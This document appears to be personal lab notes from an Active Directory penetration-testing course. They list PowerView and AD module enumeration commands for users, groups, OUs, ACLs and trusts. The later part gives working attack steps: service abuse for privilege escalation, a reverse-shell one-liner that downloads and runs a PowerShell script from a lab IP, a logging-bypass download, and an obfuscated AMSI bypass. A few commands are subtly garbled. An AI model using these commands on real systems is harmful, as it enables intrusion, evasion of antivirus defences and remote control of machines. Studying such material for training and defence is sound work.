Windows AD Exploitation

Setup InviShell

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
set COR_ENABLE_PROFILING=1
set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916b}
REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
powershell

Load PowerView:

. \PowerView.ps1

Grab DomainUser Info

Get-DomainUser

To list a specific property of all the users, we can use the select-object (or its alias select) cmdlet. For example, to list only the samaccountname run the following command:

Get-DomainUser | select -ExpandProperty samaccountname

To enumerate member computers in the domain we can use Get-DomainComputer:

Get-DomainComputer | select -ExpandProperty dnshostname

To see details of the Domain Admins group:

Get-DomainGroup -Identity "Domain Admins"

Enumerate Members

Get-DomainGroupMember -Identity "Domain Admins"

Enumerate Members of Enterprise Admins in a specified domain

Get-DomainGroupMember -Identity "Enterprise Admins" –Domain 
<DOMAIN>

Using the Active Directory module (ADModule) Let's import the ADModule. Remember to use it from a different PowerShell session started by using Invisi-Shell. If you load PowerView and the ADModule in same PowerShell session, some functions may not work:

Import-Module 'C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll'
Import-Module 'C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1'

Enumerate all the users in the current domain using the ADModule:

Get-ADUser -Filter *

Let's list samaccountname and description for the users. Note that we are listing all the proeprties first using the –Properties parameter:

Get-ADUser -Filter * -Properties *| select Samaccountname,Description
Get-ADComputer -Filter *

Enumerate Domain Administrators using the Active Directory Module:

Get-ADGroupMember -Identity 'Domain Admins'
Get-ADGroupMember -Identity 'Enterprise Admins' -Server moneycorp.local

To list all the OUs, run the below command after bypassing AMSI and loading PowerView:

Get-DomainOU
Get-DomainOU | select -ExpandProperty name

Now, to list all the computers in the StudentsMachines OU:

(Get-DomainOU -Identity StudentMachines).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
Get-DomainGPO

It is possible to hack both the commands together in a single command (profiting from the static length for GUIDs):

(Get-DomainOU -Identity StudentMachines).gplink
<SNIP Output> 
Get-DomainGPO -Identity '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}'

Get-DomainGPO -Identity (Get-DomainOU -Identity StudentMachines).gplink.substring(11,(Get-DomainOU -Identity StudentMachines).gplink.length-72)

Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs –Verbose

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "student488"}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$.IdentityReferenceName -match "RDPUsers"} | ?{$.ObjectDN -match "control488 user"}

Get-ForestDomain -Verbose Get-ForestDomain -Verbose

Get-ForestDomain | %{Get-DomainTrust -Domain $.Name} | ?{$.TrustAttributes -eq "FILTER_SIDS"} Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}

Ad-Module Commands:

(Get-ADForest).Domains Get-ADTrust -Filter * Get-ADForest | %{Get-ADTrust -Filter *} (Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_} Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)'

Get-ADTrust -Filter * -Server eurocorp.local

Using PowerUp.ps1 Get-ServiceUnquoted Get-ModifiableServiceFile -Verbose Get-ModifiableService Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student488'

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat Get-ModifiableService Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student488'

Execute Rev-Shell nc64.exe -nvlp PORT powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.88/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 172.16.100.88 -Port 443

iex (iwr http://172.16.100.88:8000/sbloggingbypass.txt -UseBasicParsing)

AMSI Bypass

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; 
( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt